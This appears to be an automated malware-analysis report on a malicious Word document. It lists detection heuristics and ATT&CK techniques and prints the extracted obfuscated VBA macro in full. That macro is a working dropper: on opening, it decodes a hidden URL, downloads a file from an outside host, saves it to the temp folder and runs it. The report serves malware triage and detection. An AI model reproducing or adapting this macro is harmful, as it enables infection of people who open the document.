MALICIOUS
330
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample is a malicious Office document containing VBA macros. The critical heuristics indicate the use of `Shell()` and `WScript.Shell`, suggesting the macro is designed to execute arbitrary commands. The `Document_Open` macro firing, combined with `OLE_VBA_PCODE_AUTOEXEC_EXEC`, strongly implies that the macro executes automatically upon opening the document to download and run a secondary payload. The ClamAV detection as 'Doc.Dropper.Donoff-5743530-0' further supports this dropper functionality.
Heuristics 10
-
ClamAV: Doc.Dropper.Donoff-5743530-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Donoff-5743530-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Dim nCeeDPf As Boolean, FxaIym As String Set pXdrWtdws = CreateObject("WScript.Shell") End Function -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Dim nCeeDPf As Boolean, FxaIym As String Set pXdrWtdws = CreateObject("WScript.Shell") End Function -
CallByName call high OLE_VBA_CALLBYNAMECallByName callMatched line in script
Public Sub eYLwpERlh(ByVal jTQvfqVVyi As Integer, ByVal evzAZHBFRs As Object, ByVal PPnSpePKe As String) CallByName evzAZHBFRs, PPnSpePKe, 1 End Sub -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
End Sub Private Sub Document_Open() Dim wKrIkRQ As Boolean -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9098 bytes |
SHA-256: ea061f90922c07ac94aa555783ae43284ee12b93e6c2d784bdf307dc2d55bda8 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
169 of 256 identifiers look randomly generated (e.g. 'shbo2pX2pbiXng2sb4byXo2bu') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub TiGkha(ByVal xMlquWywgo As String, ByVal uBdeIln As String)
wHTiRT
If mjspzU(9002, 675, "GD8u16xpiXq6R") Then
jGxNa True, "VzDpKQhumqOke", "s9wyJA7YynFRY6"
QwNZHX
tmRfIVJh 807
End If
End Sub
Private Sub TuBejJ(ByVal wjBBHYHfTE As Integer)
YoQROe 280, "DVfCvism4pfM", 3880
nSBNYIEqi
szgGkotf 3197, "x1GjTiX3BDElInW", True
End Sub
Private Sub Document_Open()
Dim wKrIkRQ As Boolean
YQrsTbUHi.OgePpyJ
End Sub
Private Sub sDXKqbqZlP()
mqxGfUKgzi 6499, "sghg9ckfB", "PhzqBaKi97EvW"
MmaltzrlX 1715
If hBTkqIt("5TKQ4phSx1gC") Then
rRoMb
Else
yqyGeqxn
End If
End Sub
Private Function BYEnbwp() As String
yhlAeROGu
BYEnbwp = "t8r9np52uuT6"
End Function
Attribute VB_Name = "AKfME"
Private Sub rmdmM(ByVal jjwrPMHg As Boolean, ByVal aAIYM As Integer)
QzYClH "Z4pkj0HqExngTl4", 8941, "tU2sk2QDXpaOId"
End Sub
Public Sub eYLwpERlh(ByVal jTQvfqVVyi As Integer, ByVal evzAZHBFRs As Object, ByVal PPnSpePKe As String)
CallByName evzAZHBFRs, PPnSpePKe, 1
End Sub
Public Sub wcBJVgmxgZ(ByVal jmxkvHgFn As Variant, ByVal xnFRUhs As String, ByVal uquUTfvrt As Variant, ByVal HjfgCR As Object, ByVal pzupg As Variant)
IXNhTW = "HTj1cqe5xt7l8Ct"
CallByName HjfgCR, xnFRUhs, 1, jmxkvHgFn, uquUTfvrt, pzupg
End Sub
Public Function EcItbLF(ByVal pzdcBi As String, ByVal TwOKvUBzk As Object, ByVal IjoqmbpmeL As String) As Variant
Dim CqfTNj As Integer, bAmMXC As Integer
Set EcItbLF = CallByName(TwOKvUBzk, pzdcBi, 2, IjoqmbpmeL)
End Function
Public Sub PvEaTWzj(ByVal BjDlGop As Variant, ByVal AYKAhrCQzW As String, ByVal DnQLUf As Integer, ByVal fAlPuwOwGS As Variant, ByVal QfoOCrOn As String, ByVal ENHUAoOz As Object)
CallByName ENHUAoOz, AYKAhrCQzW, 1, BjDlGop, fAlPuwOwGS
End Sub
Public Sub flRKpioY(ByVal kbxRy As Boolean, ByVal nTcMzlxhL As Variant, ByVal uTTrmY As Object, ByVal hMEVJqUNX As String)
CallByName uTTrmY, hMEVJqUNX, 4, nTcMzlxhL
End Sub
Private Sub NHaLno(ByVal zGNDm As Integer, ByVal zOgzx As Integer)
VYZRTX "5ATod0xo2lah"
FaPULoVT 5592, "fdBbDggks", "ZLI942GVIlp"
End Sub
Public Sub rexTPQID(ByVal gRYhj As String, ByVal XUnmhTW As Object, ByVal finvOuw As Integer, ByVal rVnBaQO As Variant, ByVal UNiNYNKFl As String)
CallByName XUnmhTW, UNiNYNKFl, 1, rVnBaQO
End Sub
Public Function WhzczRvJa(ByVal DIAvCmH As String, ByVal dwsbgSndHz As String, ByVal kTnGBfwU As Object) As Variant
Dim PVuONycMc As Integer, UNYDxtaaT As Boolean
WhzczRvJa = CallByName(kTnGBfwU, dwsbgSndHz, 2)
End Function
Attribute VB_Name = "AvlHSjEgno"
Private Sub iOhtpIWN(ByVal FnyYZVHe As Boolean, ByVal byZKiP As Integer)
JdrgwQ
End Sub
Public Function pXdrWtdws() As Object
Dim nCeeDPf As Boolean, FxaIym As String
Set pXdrWtdws = CreateObject("WScript.Shell")
End Function
Public Function ncuCh() As Object
Set ncuCh = CreateObject("MSXML2.ServerXMLHTTP.6.0")
End Function
Private Sub YXTEVLzpO()
If euVWF Then
EqgCajclK 1379, False, "wxYJthU7I"
End If
End Sub
Private Sub IUgdHTjOC(ByVal JCidtfz As String)
rwKYqDFg True, 2503
End Sub
Public Function oNzWZB() As Object
Dim bmzeolcjfe As Boolean
Set oNzWZB = CreateObject("ADODB.Stream")
End Function
Private Function kfeROuSPg() As Integer
scmBSvpTk 2792
lJSsRbNCDs
jTPYG 698, True
upFcL "VgwJp2Ob0j", "gEAg8WbfmwPxuu", 3231
kfeROuSPg = 5750
End Function
Attribute VB_Name = "HAifZ"
Public Function xpBePA(ByVal tVpwiFGr As Integer, ByVal DLEdwYNSnP As Integer, ByVal AtDDgISL As String, ByVal nMxfKcy As String) As String
Dim bEvoJYzXuD As Integer, PsDspeSF As Integer
xpBePA = Mid(nMxfKcy, tVpwiFGr, 1)
End Function
Private Sub JluYULjwP(ByVal DVEPAe As Integer, ByVal tSJXpkhdLA As String)
BkMTwPAnUV "5XpYrOKqF9", 5936
vVjYXg 5637
If LYvcZvEUHc Then
ZkAFSHcy
RYUrsdm True
aVgAUZYDE 8658, "WS04gxn6gpZV", "SNAXYPM2I"
End If
nnWkkdeYWI "b86vTiZyDG", "ogfK9ZLkZSNI", False
tvremm "27dfoMOz3yZgi5", "xZ8Wk8zZnCPVcm2", True
End Sub
Public Function dwwBZQltF(ByVal zsLiL As Integer, ByVal fFHAPFAh As Boolean, ByVal cKEqC As String, ByVal xZJpk As String) As String
dwwBZQltF = xZJpk & cKEqC
End Function
Public Function qQolhGP(ByVal FhKPZKOw As String, ByVal sVHMNjVeKL As String) As Boolean
Dim jqDPRDe As Integer
qQolhGP = InStr(1, sVHMNjVeKL, FhKPZKOw)
End Function
Attribute VB_Name = "ikgxGMeFIB"
Private Function IuqKoz(ByVal ksvJONb As Boolean, ByVal XoaMUqo As String) As Boolean
aAnoEkmH
TYWXT
SIYNpFH
If bIFLsWSDYA Then
sjrIRNel
pIxxnGPm True, 5648
Else
oRDnv
GIOdryBDU
End If
IuqKoz = False
End Function
Public Function VcJEQtch(ByVal UWzrJj As String, ByVal DvKrE As String) As String
Dim lWkHDCyY As Boolean
Dim IXHadUT As String
crcNfikH = "3SbYnWYCCzd"
For KWoJzOpom = 1 To Len(UWzrJj)
lWkHDCyY = HAifZ.qQolhGP(HAifZ.xpBePA(KWoJzOpom, 5243, YiFQBmrJpJ, UWzrJj), DvKrE)
If Not lWkHDCyY Then
VcJEQtch = HAifZ.dwwBZQltF(2102, True, HAifZ.xpBePA(KWoJzOpom, 5243, YiFQBmrJpJ, UWzrJj), VcJEQtch)
fitPL = "DJkcAgxvF"
End If
Next
End Function
Private Function FcJVs() As Integer
ngHBnhTd 5855, 1524
UimfM
kCujVAMx
If zXmQhJr Then
vMylTY
ROzIu
End If
FcJVs = 5758
End Function
Private Function YiFQBmrJpJ() As String
YiFQBmrJpJ = "XHQpd01Ine6j"
End Function
Attribute VB_Name = "YQrsTbUHi"
Private Function GlKNEX(ByVal tXXGk As String, ByVal VREGytqFmL As String) As String
Dim RtdifAmaj As Integer
Set cukhsrs = AKfME.EcItbLF(FrmAsN, AvlHSjEgno.pXdrWtdws, ikgxGMeFIB.VcJEQtch("P3RAWOVCVES3VS", ".A3VW"))
GlKNEX = cukhsrs(tXXGk)
End Function
Private Function cMtpHkTzI() As String
cMtpHkTzI = ikgxGMeFIB.VcJEQtch("OYp4eCnC", "CY4 ")
End Function
Private Function FrmAsN() As String
FrmAsN = ikgxGMeFIB.VcJEQtch("E8nYYvGirbYoGnbm8eBnGt", "8bBGYX")
End Function
Private Function wDxVDiP() As String
wDxVDiP = "SanhfpZ6A"
End Function
Private Sub SCLTF(ByVal juqeCxW As String, ByVal MWSSGjrGf As String)
Set TizlUYvbfU = AvlHSjEgno.ncuCh
AKfME.wcBJVgmxgZ GNQhUIo, ikgxGMeFIB.VcJEQtch("OYp4eCnC", "CY4 "), juqeCxW, TizlUYvbfU, False
AKfME.PvEaTWzj ikgxGMeFIB.VcJEQtch("UJsJJerj-JJAjgJeJnGt", "GJj"), TyKKR, 2963, ikgxGMeFIB.VcJEQtch("M55oLzLil57laqq/45.5B0 L(5cBqo5mpq5atOiqLbl7Be7;B)", "5LqO7B"), DmFBYFq, TizlUYvbfU
AKfME.eYLwpERlh 1177, TizlUYvbfU, nPuTLYAkX
NPcHcNUFa True, 6317, MWSSGjrGf, AKfME.WhzczRvJa(DmFBYFq, uWSGeGkFQ, TizlUYvbfU)
End Sub
Private Function uWSGeGkFQ() As String
uWSGeGkFQ = ikgxGMeFIB.VcJEQtch(".ReXsGOpoqnOsOeqBGOoqdyG", ".GXqO")
End Function
Private Sub iTloqiT()
Dim SOwnnjcsI As Integer
OIRUtHf = True
On Error GoTo brfyZKMnfD
zIxdob = False
SCLTF pjakaWHWA, ulQwtLa
CDzAraJszL ulQwtLa
Exit Sub
brfyZKMnfD:
End Sub
Private Function ulQwtLa() As String
Dim qgoRkLGhL As Integer, hIKrUpMu As Integer
ulQwtLa = GlKNEX(ikgxGMeFIB.VcJEQtch("ZTEUMZsP", "9cZUsX"), "43nl4nAIC8yPM") & utDmFlK
End Function
Private Function OIdGjN() As String
OIdGjN = ikgxGMeFIB.VcJEQtch("nTyHpaeB", "HBaqXn")
End Function
Private Function utDmFlK() As String
Dim QHtECXnn As Integer
Dim AILmw As Integer
JJNlxuFaS = True
utDmFlK = HujdV
End Function
Private Sub CDzAraJszL(ByVal LHdnE As String)
AKfME.rexTPQID "RUhBCEFChjJ", AvlHSjEgno.pXdrWtdws, 7188, LHdnE, ikgxGMeFIB.VcJEQtch("kEx2eI1c", "k31IG2")
End Sub
Private Function DmFBYFq() As String
DmFBYFq = "uUEq52NnRT9EkX"
End Function
Public Sub OgePpyJ()
Dim HORvStS As Integer
Dim ZiHhqz As Boolean
kZsag = 4121
iTloqiT
End Sub
Private Function bfkNgtlLD() As String
bfkNgtlLD = ikgxGMeFIB.VcJEQtch("YClm/o/s0e", "0dY/m")
End Function
Private Function pjakaWHWA() As String
Dim tpzysZTEN As Integer
pjakaWHWA = ikgxGMeFIB.VcJEQtch("h2bttXpb2:X//22shbo2pX2pbiXng2sb4byXo2bu.XcXXobm/2bsyXbsXtbemXb/bcXacbh22eX/2woXrXd2X.2ex2eb", "2Xb")
End Function
Private Sub NPcHcNUFa(ByVal uvQagv As Boolean, ByVal XRtbfiZodr As Integer, ByVal fRNSGEppa As String, ByVal mSfSoH As Variant)
Dim KvePG As Boolean
Dim kJwdcWWOsW As Integer
Set dPCsuso = AvlHSjEgno.oNzWZB
AKfME.flRKpioY True, 1, dPCsuso, OIdGjN
AKfME.eYLwpERlh 1177, dPCsuso, cMtpHkTzI
uRUxACPwrk = 5904
AKfME.rexTPQID wDxVDiP, dPCsuso, 7188, mSfSoH, ikgxGMeFIB.VcJEQtch("Wbbribtzek", "Zzlmkb")
sIbLjqP = "uhzu7PE4rcOp"
AKfME.PvEaTWzj fRNSGEppa, bKboP, 2963, 2, wDxVDiP, dPCsuso
AKfME.eYLwpERlh 1177, dPCsuso, bfkNgtlLD
End Sub
Private Function GNQhUIo() As String
XBoKEL = False
GNQhUIo = ikgxGMeFIB.VcJEQtch("G.E TB", ".BA ")
End Function
Private Function bKboP() As String
bKboP = ikgxGMeFIB.VcJEQtch("pSraUvremToVUFimlVed", "mprdUV")
End Function
Private Function HujdV() As String
HujdV = ikgxGMeFIB.VcJEQtch("o/o9UdbI3ocY0Y85YcY31U.oeoxUeU", "YI8Uo")
End Function
Private Function TyKKR() As String
TyKKR = ikgxGMeFIB.VcJEQtch("SEehtELReLlqhuelshhtLHhepaldlelr", "ELlhp")
End Function
Private Function nPuTLYAkX() As String
nPuTLYAkX = ikgxGMeFIB.VcJEQtch("SIerIndr", "MIrG")
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.